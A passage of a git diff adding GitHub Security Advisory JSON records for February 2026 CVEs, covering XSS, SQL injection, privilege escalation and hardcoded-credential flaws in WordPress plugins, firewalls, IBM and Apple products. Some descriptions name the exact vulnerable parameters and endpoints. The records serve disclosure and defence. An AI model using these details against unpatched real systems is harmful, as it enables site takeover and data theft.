b/advisories/unreviewed/2026/02/GHSA-whjx-jr95-pc2f/GHSA-whjx-jr95-pc2f.json new file mode 100644 index 0000000000000..3daeef05feb57 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-whjx-jr95-pc2f/GHSA-whjx-jr95-pc2f.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whjx-jr95-pc2f", + "modified": "2026-02-14T09:31:33Z", + "published": "2026-02-14T09:31:33Z", + "aliases": [ + "CVE-2026-0736" + ], + "details": "The Chatbot for WordPress by Collect.chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the '_inpost_head_script[synth_header_script]' post meta field in all versions up to, and including, 2.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0736" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/collectchat/tags/2.4.8/collect.php#L282" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/collectchat/tags/2.4.8/collect.php#L388" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/collectchat/trunk/collect.php#L282" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/collectchat/trunk/collect.php#L388" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/fb62f4c2-ce9f-4958-8b83-cc0d5f4d4647?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-14T07:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json b/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json new file mode 100644 index 0000000000000..239db0c71b690 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-whmh-gx62-v47m/GHSA-whmh-gx62-v47m.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whmh-gx62-v47m", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-59920" + ], + "details": "When hours are entered in time@work, version 7.0.5, it performs a query to display the projects assigned to the user. If the query URL is copied and opened in a new browser window, the ‘IDClient’ parameter is vulnerable to a blind authenticated SQL injection. If the request is made with the TWAdmin user with the sysadmin role enabled, exploiting the vulnerability will allow commands to be executed on the system; if the user does not belong to the sysadmin role, they will still be able to query data from the database.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59920" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/sql-injection-timework-systemswork" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-whpx-mf6c-fq99/GHSA-whpx-mf6c-fq99.json b/advisories/unreviewed/2026/02/GHSA-whpx-mf6c-fq99/GHSA-whpx-mf6c-fq99.json new file mode 100644 index 0000000000000..7e02090adbbfd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-whpx-mf6c-fq99/GHSA-whpx-mf6c-fq99.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whpx-mf6c-fq99", + "modified": "2026-02-16T15:32:47Z", + "published": "2026-02-16T15:32:47Z", + "aliases": [ + "CVE-2026-1333" + ], + "details": "A Use of Uninitialized Variable vulnerability affecting the EPRT file reading procedure in SOLIDWORKS eDrawings from Release SOLIDWORKS Desktop 2025 through Release SOLIDWORKS Desktop 2026 could allow an attacker to execute arbitrary code while opening a specially crafted EPRT file.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1333" + }, + { + "type": "WEB", + "url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2026-1333" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-457" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-16T14:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-whxx-5mgj-36jh/GHSA-whxx-5mgj-36jh.json b/advisories/unreviewed/2026/02/GHSA-whxx-5mgj-36jh/GHSA-whxx-5mgj-36jh.json new file mode 100644 index 0000000000000..d55dac1df64ce --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-whxx-5mgj-36jh/GHSA-whxx-5mgj-36jh.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whxx-5mgj-36jh", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25417" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted input to the protocol parameter. Attackers can send POST requests to the QoS rules management endpoint with JavaScript payloads in the protocol parameter to execute arbitrary code in administrator browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25417" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-reflected-cross-site-scripting-via-qos-rules" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wj34-3cm4-v64v/GHSA-wj34-3cm4-v64v.json b/advisories/unreviewed/2026/02/GHSA-wj34-3cm4-v64v/GHSA-wj34-3cm4-v64v.json new file mode 100644 index 0000000000000..fae1a23991ed1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wj34-3cm4-v64v/GHSA-wj34-3cm4-v64v.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj34-3cm4-v64v", + "modified": "2026-02-19T00:30:29Z", + "published": "2026-02-19T00:30:29Z", + "aliases": [ + "CVE-2019-25396" + ], + "details": "IPFire 2.21 Core Update 127 contains a reflected cross-site scripting vulnerability in the updatexlrator.cgi script that allows attackers to inject malicious scripts through POST parameters. Attackers can submit crafted requests with script payloads in the MAX_DISK_USAGE or MAX_DOWNLOAD_RATE parameters to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25396" + }, + { + "type": "WEB", + "url": "https://downloads.ipfire.org/releases/ipfire-2.x/2.21-core127/ipfire-2.21.x86_64-full-core127.iso" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46344" + }, + { + "type": "WEB", + "url": "https://www.ipfire.org" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ipfire-core-update-reflected-xss-via-updatexlrator" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wj4m-c5pc-p9r9/GHSA-wj4m-c5pc-p9r9.json b/advisories/unreviewed/2026/02/GHSA-wj4m-c5pc-p9r9/GHSA-wj4m-c5pc-p9r9.json new file mode 100644 index 0000000000000..e553b9435d6ab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wj4m-c5pc-p9r9/GHSA-wj4m-c5pc-p9r9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj4m-c5pc-p9r9", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-33089" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 could allow a remote attacker to obtain sensitive information or perform unauthorized actions due to the use of hard coded user credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33089" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260162" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wj5q-5q5g-5j5w/GHSA-wj5q-5q5g-5j5w.json b/advisories/unreviewed/2026/02/GHSA-wj5q-5q5g-5j5w/GHSA-wj5q-5q5g-5j5w.json new file mode 100644 index 0000000000000..cb4f8c6c51c2f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wj5q-5q5g-5j5w/GHSA-wj5q-5q5g-5j5w.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj5q-5q5g-5j5w", + "modified": "2026-02-13T00:32:52Z", + "published": "2026-02-13T00:32:52Z", + "aliases": [ + "CVE-2026-26225" + ], + "details": "Intego Personal Backup, a macOS backup utility that allows users to create scheduled backups and bootable system clones, contains a local privilege escalation vulnerability. Backup task definitions are stored in a location writable by non-privileged users while being processed with elevated privileges. By crafting a malicious serialized task file, a local attacker can trigger arbitrary file writes to sensitive system locations, leading to privilege escalation to root.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26225" + }, + { + "type": "WEB", + "url": "https://blog.quarkslab.com/intego_lpe_macos_1.html" + }, + { + "type": "WEB", + "url": "https://integosupport.zendesk.com/hc/en-us/articles/40945636077467-Personal-Backup-X9-Release-Notes" + }, + { + "type": "WEB", + "url": "https://www.intego.com" + }, + { + "type": "WEB", + "url": "https://www.intego.com/bootable-mac-backups" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/intego-personal-backup-task-file-privilege-escalation" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T22:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wj6w-x5qq-4qqw/GHSA-wj6w-x5qq-4qqw.json b/advisories/unreviewed/2026/02/GHSA-wj6w-x5qq-4qqw/GHSA-wj6w-x5qq-4qqw.json new file mode 100644 index 0000000000000..c62ba6d372f3b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wj6w-x5qq-4qqw/GHSA-wj6w-x5qq-4qqw.json @@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj6w-x5qq-4qqw", + "modified": "2026-02-12T15:32:47Z", + "published": "2026-02-12T06:30:13Z", + "aliases": [ + "CVE-2025-14892" + ], + "details": "The Prime Listing Manager WordPress plugin through 1.1 allows an attacker to gain administrative access without having any kind of account on the targeted site and perform unauthorized actions due to a hardcoded secret.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14892" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/d12332ec-1d0c-4ff5-94e0-7c4470bdb79c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T06:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wj8f-mjpv-f78g/GHSA-wj8f-mjpv-f78g.json b/advisories/unreviewed/2026/02/GHSA-wj8f-mjpv-f78g/GHSA-wj8f-mjpv-f78g.json new file mode 100644 index 0000000000000..5d44daf9de231 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wj8f-mjpv-f78g/GHSA-wj8f-mjpv-f78g.json @@ -0,0 +1,62 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj8f-mjpv-f78g", + "modified": "2026-02-13T00:32:51Z", + "published": "2026-02-12T00:31:04Z", + "aliases": [ + "CVE-2026-20634" + ], + "details": "The issue was addressed with improved memory handling. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. Processing a maliciously crafted image may result in disclosure of process memory.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20634" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126348" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126349" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126350" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126351" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126352" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126353" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json b/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json new file mode 100644 index 0000000000000..ab1ae0c19d6e0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjf9-j9vw-27f4", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2025-70064" + ], + "details": "PHPGurukul Hospital Management System v4.0 contains a Privilege Escalation vulnerability. A low-privileged user (Patient) can directly access the Administrator Dashboard and all sub-modules (e.g., User Logs, Doctor Management) by manually browsing to the /admin/ directory after authentication. This allows any self-registered user to takeover the application, view confidential logs, and modify system data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70064" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Sanka1pp/c6f20cd6db1fbb1f0e7e199ead66691d" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/213711" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T19:21:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wm72-rvv8-pj93/GHSA-wm72-rvv8-pj93.json b/advisories/unreviewed/2026/02/GHSA-wm72-rvv8-pj93/GHSA-wm72-rvv8-pj93.json new file mode 100644 index 0000000000000..1e3967ca37956 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wm72-rvv8-pj93/GHSA-wm72-rvv8-pj93.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wm72-rvv8-pj93", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-23805" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Yoren Chang Media Search Enhanced media-search-enhanced allows SQL Injection.This issue affects Media Search Enhanced: from n/a through <= 0.9.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23805" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/media-search-enhanced/vulnerability/wordpress-media-search-enhanced-plugin-0-9-1-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wm8j-hgw9-h534/GHSA-wm8j-hgw9-h534.json b/advisories/unreviewed/2026/02/GHSA-wm8j-hgw9-h534/GHSA-wm8j-hgw9-h534.json new file mode 100644 index 0000000000000..f8c52c623738e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wm8j-hgw9-h534/GHSA-wm8j-hgw9-h534.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wm8j-hgw9-h534", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-27899" + ], + "details": "IBM DB2 Recovery Expert for LUW 5.5 Interim Fix 002 discloses sensitive information in an environment variable that could aid in further attacks against the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27899" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-526" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wmpp-2v6j-mq33/GHSA-wmpp-2v6j-mq33.json b/advisories/unreviewed/2026/02/GHSA-wmpp-2v6j-mq33/GHSA-wmpp-2v6j-mq33.json new file mode 100644 index 0000000000000..cac46c27526f2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wmpp-2v6j-mq33/GHSA-wmpp-2v6j-mq33.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wmpp-2v6j-mq33", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-23617" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain a stored cross-site scripting vulnerability in the Spam Keyword Checking (Body) conditions interface. An authenticated user can supply HTML/JavaScript in the ctl00$ContentPlaceHolder1$pvGeneral$TXB_Condition parameter to /MailEssentials/pages/MailSecurity/ASKeywordChecking.aspx, which is stored and later rendered in the management interface, allowing script execution in the context of a logged-in user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23617" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-anti-spam-spam-keyword-checking-body-condition-stored-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:24:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wmq7-3p89-w6h8/GHSA-wmq7-3p89-w6h8.json b/advisories/unreviewed/2026/02/GHSA-wmq7-3p89-w6h8/GHSA-wmq7-3p89-w6h8.json new file mode 100644 index 0000000000000..39700aa88f517 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wmq7-3p89-w6h8/GHSA-wmq7-3p89-w6h8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wmq7-3p89-w6h8", + "modified": "2026-02-17T15:31:35Z", + "published": "2026-02-17T09:31:24Z", + "aliases": [ + "CVE-2026-0829" + ], + "details": "The Frontend File Manager Plugin WordPress plugin through 23.5 allows unauthenticated users to send emails through the site without any security checks. This lets attackers use the WordPress site as an open relay for spam or phishing emails to anyone. Attackers can also guess file IDs to access and share uploaded files without permission, exposing sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0829" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/57d62cea-cfb8-4421-a209-e64a015ad225" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T07:16:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wmwp-mm98-6v2w/GHSA-wmwp-mm98-6v2w.json b/advisories/unreviewed/2026/02/GHSA-wmwp-mm98-6v2w/GHSA-wmwp-mm98-6v2w.json new file mode 100644 index 0000000000000..88f1197fede2a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wmwp-mm98-6v2w/GHSA-wmwp-mm98-6v2w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wmwp-mm98-6v2w", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2025-41023" + ], + "details": "An authentication bypass vulnerability has been found in Thesamur's AutoGPT. This vulnerability allows an attacker to bypass authentication mechanisms. Once inside the web application, the attacker can use any of its features regardless of the authorisation method used.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41023" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/authentication-bypass-autogpt-de-thesamur" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json new file mode 100644 index 0000000000000..34a5ea5e82e9e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wp4v-6rrv-wqv9", + "modified": "2026-02-13T15:30:24Z", + "published": "2026-02-12T00:31:05Z", + "aliases": [ + "CVE-2026-20655" + ], + "details": "An authorization issue was addressed with improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, iOS 18.7.5 and iPadOS 18.7.5. An attacker with physical access to a locked device may be able to view sensitive user information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20655" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126346" + }, + { + "type": "WEB", + "url": "https://support.apple.com/en-us/126347" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T23:16:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wp7f-392c-hj4c/GHSA-wp7f-392c-hj4c.json b/advisories/unreviewed/2026/02/GHSA-wp7f-392c-hj4c/GHSA-wp7f-392c-hj4c.json new file mode 100644 index 0000000000000..31c4661c5af11 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wp7f-392c-hj4c/GHSA-wp7f-392c-hj4c.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wp7f-392c-hj4c", + "modified": "2026-02-15T06:31:35Z", + "published": "2026-02-15T06:31:35Z", + "aliases": [ + "CVE-2026-1750" + ], + "details": "The Ecwid by Lightspeed Ecommerce Shopping Cart plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 7.0.7. This is due to a missing capability check in the 'save_custom_user_profile_fields' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to supply the 'ec_store_admin_access' parameter during a profile update and gain store manager access to the site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1750" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ecwid-shopping-cart/tags/7.0.7/includes/class-ec-store-admin-access.php#L28" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3460721/ecwid-shopping-cart#file2" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2d29f77c-b86d-4058-b528-27631e8a1f2e?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-15T04:15:54Z" + } +} \ No newline at end of file diff --git 